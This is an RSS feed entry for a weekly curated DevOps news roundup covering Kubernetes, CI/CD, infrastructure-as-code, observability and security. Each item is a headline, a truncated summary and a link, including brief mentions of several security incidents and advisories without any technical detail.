      <link>https://devops-daily.com/news/2026-week-22</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 25 May 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-22</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-why-kubernetes-policy-enforcement-happens-too-lateand-what-to-do-about-it" class="group relative scroll-mt-24">
        <a href="#h3-why-kubernetes-policy-enforcement-happens-too-lateand-what-to-do-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Kubernetes policy enforcement happens too late—and what to do about it
        </a>
        </h3><p>Kubernetes has become the backbone of modern cloud-native infrastructure. Its flexibility lets teams move fast, compose complex systems from modular components, and deploy across environments with rel</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/25/why-kubernetes-policy-enforcement-happens-too-late-and-what-to-do-about-it/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-zero-downtime-migration-from-ingress-nginx-to-envoy-gateway" class="group relative scroll-mt-24">
        <a href="#h3-zero-downtime-migration-from-ingress-nginx-to-envoy-gateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Zero-Downtime migration from ingress NGINX to Envoy Gateway
        </a>
        </h3><p>Teams running Ingress NGINX in production are increasingly evaluating migration paths as Kubernetes networking evolves toward Gateway API. For many organizations, the challenge is not just selecting a</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/25/zero-downtime-migration-from-ingress-nginx-to-envoy-gateway/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-neo-automations-scheduled-tasks-shipped-as-pull-requests" class="group relative scroll-mt-24">
        <a href="#h3-neo-automations-scheduled-tasks-shipped-as-pull-requests" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Neo Automations: Scheduled Tasks Shipped as Pull Requests
        </a>
        </h3><p>Recurring platform work slips: provider versions fall behind, drift accumulates between checks, and the quarterly audit keeps getting pushed back another month. Pulumi Neo can now run any task on a ca</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/neo-automations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-powered-event-driven-amazon-eks-ami-updates-with-gitops" class="group relative scroll-mt-24">
        <a href="#h3-ai-powered-event-driven-amazon-eks-ami-updates-with-gitops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI-powered event-driven Amazon EKS AMI updates with GitOps
        </a>
        </h3><p>This post demonstrates an automated solution that combines AI-powered risk analysis with GitOps principles to streamline Amazon EKS AMI updates while maintaining appropriate human oversight through fa</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/ai-powered-event-driven-amazon-eks-ami-updates-with-gitops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-managing-k8s-agent-updates-at-scale-with-helm-and-terraform" class="group relative scroll-mt-24">
        <a href="#h3-managing-k8s-agent-updates-at-scale-with-helm-and-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Managing K8s Agent Updates at Scale with Helm and Terraform
        </a>
        </h3><p>Managing an agent on a single Kubernetes cluster is usually straightforward. Managing that same agent across five, ten, or fifty clusters is where things get harder. When you need to roll out an agent</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Kubecost Blog</strong></p>
<p><a href="https://www.apptio.com/blog/managing-k8s-agent-updates-at-scale-with-helm-and-terraform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-etcd-370-beta0" class="group relative scroll-mt-24">
        <a href="#h3-announcing-etcd-370-beta0" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing etcd 3.7.0-beta.0
        </a>
        </h3><p>SIG-Etcd announces the availability of the first beta release of etcd v3.7.0. This new version of the popular distributed database and key Kubernetes component includes the long-requested RangeStream </p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/20/etcd-370-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-etcd-v370-beta0" class="group relative scroll-mt-24">
        <a href="#h3-announcing-etcd-v370-beta0" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing etcd v3.7.0-beta.0
        </a>
        </h3><p>SIG-Etcd announces the availability of the first beta release of etcd v3.7.0. This new version of the popular distributed database and key Kubernetes component includes the long-requested RangeStream </p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 etcd Blog</strong></p>
<p><a href="https://etcd.io/blog/2026/etcd-370-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation" class="group relative scroll-mt-24">
        <a href="#h3-simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplify AI infrastructure for AWS Trainium and Elastic Fabric Adapter with Kubernetes Dynamic Resource Allocation
        </a>
        </h3><p>As organizations scale AI workloads in containerized environments, they face the complexity of managing specialized hardware that creates friction between infrastructure teams focused on stability and</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-opentelemetry-is-a-cncf-graduated-project" class="group relative scroll-mt-24">
        <a href="#h3-opentelemetry-is-a-cncf-graduated-project" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenTelemetry is a CNCF Graduated Project
        </a>
        </h3><p>Today, the Cloud Native Computing Foundation (CNCF) announced that OpenTelemetry has graduated. Graduation is an important milestone for the project and reflects the strength of the OpenTelemetry comm</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/otel-graduates/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aamchi-mumbai-a-kubecon-cloudnativecon-field-guide" class="group relative scroll-mt-24">
        <a href="#h3-aamchi-mumbai-a-kubecon-cloudnativecon-field-guide" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Aamchi Mumbai: A KubeCon + CloudNativeCon field guide
        </a>
        </h3><p>Welcome to Mumbai. KubeCon + CloudNativeCon India lands in Mumbai on 18-19 June 2026, at the Jio World Convention Centre in BKC. Thousands of cloud native engineers are flying in, many of you for the f</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/21/aamchi-mumbai-a-kubecon-cloudnativecon-field-guide/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-meet-gordon-dockers-ai-agent-for-your-entire-container-workflow" class="group relative scroll-mt-24">
        <a href="#h3-meet-gordon-dockers-ai-agent-for-your-entire-container-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Meet Gordon: Docker’s AI Agent For Your Entire Container Workflow
        </a>
        </h3><p>Gordon understands your environment, proposes fixes, and takes action across your entire Docker workflow. Now generally available. Why Gordon Exists Developers are mo</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/meet-gordon-dockers-ai-agent-for-your-entire-container-workflow/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bitnami-image-removal-from-ecr-public" class="group relative scroll-mt-24">
        <a href="#h3-bitnami-image-removal-from-ecr-public" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bitnami image removal from ECR Public
        </a>
        </h3><p>Starting on June 10th, 2026, Bitnami container images will no longer be available on Amazon ECR Public Gallery. If you currently pull Bitnami images directly from ECR Public in your workloads, you nee</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/bitnami-image-removal-from-ecr-public/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-coding-agent-horror-stories-the-security-crisis-threatening-developer-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-coding-agent-horror-stories-the-security-crisis-threatening-developer-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Coding Agent Horror Stories: The Security Crisis Threatening Developer Infrastructure
        </a>
        </h3><p>This is issue 1 of a new series called Coding Agent Horror Stories where we examine critical security failures in the AI coding agent ecosystem and how Docker Sandboxes provide enterprise-grade protec</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/ai-coding-agent-horror-stories-security-risks/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-ai-agents-in-cicd-pipelines-speed-vs-control-in-modern-devops" class="group relative scroll-mt-24">
        <a href="#h3-ai-agents-in-cicd-pipelines-speed-vs-control-in-modern-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Agents in CI/CD Pipelines: Speed vs Control in Modern DevOps
        </a>
        </h3><p>The moment you push your code, deployment fires off on its own. The pipeline kicks in, the tests sail through, and within a few minutes your app is live in production. There is no manual sign-off and </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-agents-in-ci-cd-pipelines-speed-vs-control-in-modern-devops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-experiment-approvals" class="group relative scroll-mt-24">
        <a href="#h3-introducing-experiment-approvals" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Experiment Approvals
        </a>
        </h3><p>Add a safety check before experiment changes reach users.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/introducing-experiment-approvals/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions" class="group relative scroll-mt-24">
        <a href="#h3-designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Designing an AI-Powered DevSecOps Guardrail Pipeline Using GitHub Actions
        </a>
        </h3><p>By embedding AI-powered guardrails directly into CI/CD pipelines, organizations can detect vulnerabilities earlier, enforce security policies automatically and accelerate secure software delivery.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-conversations-to-community-our-first-mongodb-dbdevops" class="group relative scroll-mt-24">
        <a href="#h3-from-conversations-to-community-our-first-mongodb-dbdevops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Conversations to Community: Our First MongoDB DBDevOps
        </a>
        </h3><p>Harness and Namma MUG hosted India’s first MongoDB Database DevOps meetup, exploring CI/CD, automation, migrations, and MongoDB-native workflows.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/from-conversations-to-community-our-first-mongodb-dbdevops-meetup-in-india"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made" class="group relative scroll-mt-24">
        <a href="#h3-beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond the engine: 10 open source projects shaping how games actually get made
        </a>
        </h3><p>Check out these 10 open source tools that help game developers create art, animation, levels, audio, dialogue, debug UIs, and engine-ready assets.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/gaming/beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-githubs-next-chapter-in-accessibility" class="group relative scroll-mt-24">
        <a href="#h3-building-githubs-next-chapter-in-accessibility" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building GitHub’s next chapter in accessibility
        </a>
        </h3><p>Explore our update on GitHub’s accessibility strategy, and learn how you can join us in building a culture of accessibility.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/building-githubs-next-chapter-in-accessibility/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-transform-mrs-from-manual-tasks-to-an-automated-workflow" class="group relative scroll-mt-24">
        <a href="#h3-transform-mrs-from-manual-tasks-to-an-automated-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Transform MRs from manual tasks to an automated workflow
        </a>
        </h3><p>AI made writing code dramatically faster, but the work between opening a merge request and merging it has stayed almost entirely manual. Assigning reviewers, addressing feedback round after round, unt</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/transform-mrs-to-automated-workflow/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-track-ci-component-usage-across-your-organization" class="group relative scroll-mt-24">
        <a href="#h3-track-ci-component-usage-across-your-organization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Track CI component usage across your organization
        </a>
        </h3><p>If your platform team publishes standardized pipeline components, you&#39;ve probably encountered this: once they&#39;re out in the wild, you lose visibility. You can&#39;t see if anyone’s actually using it, who&#39;</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/track-ci-component-usage/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-manage-cicd-credentials-with-gitlab-secrets-manager" class="group relative scroll-mt-24">
        <a href="#h3-manage-cicd-credentials-with-gitlab-secrets-manager" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Manage CI/CD credentials with GitLab Secrets Manager
        </a>
        </h3><p>Many credential leaks start with a developer who needs a credential, doesn’t have a good place to put it, and improvises. It lands in an over-scoped CI/CD variable, a config file, or a .env committed </p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/secrets-manager-in-public-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-more-ai-models-for-gitlab-duo-agent-platform-self-hosted" class="group relative scroll-mt-24">
        <a href="#h3-more-ai-models-for-gitlab-duo-agent-platform-self-hosted" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 More AI models for GitLab Duo Agent Platform Self-Hosted
        </a>
        </h3><p>Customers running GitLab Duo Agent Platform Self-Hosted operate under constraints many software teams don&#39;t face: data residency mandates, air-gapped networks, and compliance regulations that prohibit</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/more-ai-models-for-duo-agent-platform-self-hosted/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-investigating-unauthorized-access-to-github-owned-repositories" class="group relative scroll-mt-24">
        <a href="#h3-investigating-unauthorized-access-to-github-owned-repositories" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Investigating unauthorized access to GitHub-owned repositories
        </a>
        </h3><p>If any impact is discovered, customers will be notified via established incident response and notification channels.</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-consolidate-registries-to-accelerate-secure-cicd-flows" class="group relative scroll-mt-24">
        <a href="#h3-consolidate-registries-to-accelerate-secure-cicd-flows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Consolidate registries to accelerate secure CI/CD flows
        </a>
        </h3><p>Artifact repository sprawl across multiple registries creates CI/CD bottlenecks, security blind spots, and compliance gaps. Learn how registry consolidation with unified governance fixes it.</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/why-artifact-repository-sprawl-slows-down-software-delivery"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-introducing-pulumi-do-direct-resource-operations-for-any-cloud" class="group relative scroll-mt-24">
        <a href="#h3-introducing-pulumi-do-direct-resource-operations-for-any-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing pulumi do: Direct Resource Operations for Any Cloud
        </a>
        </h3><p>Infrastructure as code is the right model for production systems. State tracking, drift detection, and repeatable deployments all matter when you’re managing real workloads. But sometimes, you also ne</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/pulumi-do-direct-resource-operations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-streamlining-red-hat-openshift-multicluster-management-with-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-streamlining-red-hat-openshift-multicluster-management-with-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Streamlining Red Hat OpenShift multicluster management with Red Hat Ansible Automation Platform
        </a>
        </h3><p>Multicluster management has been a rapidly evolving part of ITOps over the past several years. As organizations deploy hundreds to thousands of clusters across distributed environments, it’s important</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/streamlining-red-hat-openshift-multicluster-management-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bringing-neo-to-github-and-slack" class="group relative scroll-mt-24">
        <a href="#h3-bringing-neo-to-github-and-slack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bringing Neo to GitHub and Slack
        </a>
        </h3><p>This week, Pulumi Neo started working in two more places: GitHub and Slack. The agent that already runs Pulumi tasks from the Cloud console and the terminal now participates in the threads where your </p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/neo-github-slack/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-seven-rules-for-building-an-ai-native-software-factory" class="group relative scroll-mt-24">
        <a href="#h3-seven-rules-for-building-an-ai-native-software-factory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Seven Rules for Building an AI-Native Software Factory
        </a>
        </h3><p>Ewan Dawson is CTO of Compostable AI, where five engineers run an AI-native software factory: nineteen clients, custom AWS deployments, most of them shipped within a day of contract signing. This arti</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/seven-rules-ai-native-software-factory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-upgrading-fedora-with-zabbix-and-ansible" class="group relative scroll-mt-24">
        <a href="#h3-upgrading-fedora-with-zabbix-and-ansible" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Upgrading Fedora with Zabbix and Ansible
        </a>
        </h3><p>Fedora is a global open source project and Linux distribution that provides a platform for innovation and collaboration. Its infrastructure is managed by a dedicated team of professionals and voluntee</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Zabbix Blog</strong></p>
<p><a href="https://blog.zabbix.com/upgrading-fedora-with-zabbix-and-ansible/32915/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-route-claude-code-through-mlflow-ai-gateway" class="group relative scroll-mt-24">
        <a href="#h3-route-claude-code-through-mlflow-ai-gateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Route Claude Code Through MLflow AI Gateway
        </a>
        </h3><p>Learn how to route Claude Code through MLflow AI Gateway to get full observability, budget controls, and guardrails across all your coding agent sessions, with no changes to how you use Claude Code.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 MLflow Blog</strong></p>
<p><a href="https://mlflow.org/blog/gateway-claude-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whos-monitoring-the-agents" class="group relative scroll-mt-24">
        <a href="#h3-whos-monitoring-the-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Who’s monitoring the agents?
        </a>
        </h3><p>Over the past few months, something quietly shifted. Frameworks like CrewAI, AutoGen, and LangGraph are no longer just showing up</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/who-monitors-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms" class="group relative scroll-mt-24">
        <a href="#h3-designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Designing end-to-end ingress request tracing for multi-tenant SaaS platforms
        </a>
        </h3><p>Modern SaaS platforms built on cloud‑native architectures frequently consist of dozens of independently deployed microservices. A single customer request entering the platform at the ingress layer may</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/22/designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-product-analytics-you-already-have" class="group relative scroll-mt-24">
        <a href="#h3-the-product-analytics-you-already-have" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The product analytics you already have
        </a>
        </h3><p>Your Sentry traces, logs, and metrics already answer most product analytics questions. Learn how to query existing telemetry for product insights.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/product-analytics-you-already-have/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automate root cause analysis across Datadog and Elasticsearch with AWS DevOps Agent
        </a>
        </h3><p>Modern distributed systems route business transactions through dozens of microservices, message queues, and event streams. When a message fails to process or processing exceeds SLA thresholds, trouble</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-applying-opentelemetry-security-practices-in-legacy-environments" class="group relative scroll-mt-24">
        <a href="#h3-applying-opentelemetry-security-practices-in-legacy-environments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Applying OpenTelemetry Security Practices in Legacy Environments
        </a>
        </h3><p>OpenTelemetry is gaining traction in manufacturing and other legacy environments as organizations explore modern observability approaches. However, applying these practices in traditional systems intr</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/security-legacy-environments/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-exploitation-of-knowledgedeliver-via-viewstate-deserialization-vulnerability" class="group relative scroll-mt-24">
        <a href="#h3-exploitation-of-knowledgedeliver-via-viewstate-deserialization-vulnerability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Exploitation of KnowledgeDeliver via ViewState Deserialization Vulnerability
        </a>
        </h3><p>Written by: Takahiro Sugiyama, Peter Revelant, Mathew Potaczek Introduction In late 2025, Mandiant responded to a security incident involving a compromised web server running KnowledgeDeliver. Knowled</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/knowledgedeliver-viewstate-deserialization-vulnerability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-laravel-lang-supply-chain-advisory" class="group relative scroll-mt-24">
        <a href="#h3-laravel-lang-supply-chain-advisory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Laravel Lang Supply Chain Advisory
        </a>
        </h3><p>Hundreds of historical Laravel Lang Packagist releases were republished with malicious code, putting Composer installs at risk of credential theft and secret exfiltration.</p>
<p><strong>📅 May 23, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/laravel-lang-supply-chain-advisory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system" class="group relative scroll-mt-24">
        <a href="#h3-attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Attackers Can Exploit a Claude Code RCE Flaw to Take Command of System
        </a>
        </h3><p>A dangerous vulnerability found in Anthropic’s popular Claude Code developer model could have allowed bad actors to grab control of a victim’s system by luring them into clicking on a crafted maliciou</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-security-agent-adds-verification-scripts-for-pentest-findings" class="group relative scroll-mt-24">
        <a href="#h3-aws-security-agent-adds-verification-scripts-for-pentest-findings" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Security Agent adds verification scripts for pentest findings
        </a>
        </h3><p>AWS Security Agent now generates verification scripts for penetration test findings, enabling security teams to independently reproduce and validate discovered vulnerabilities. Previously, teams manua</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-security-agent/"><strong>🔗 Read more</strong></a></p>
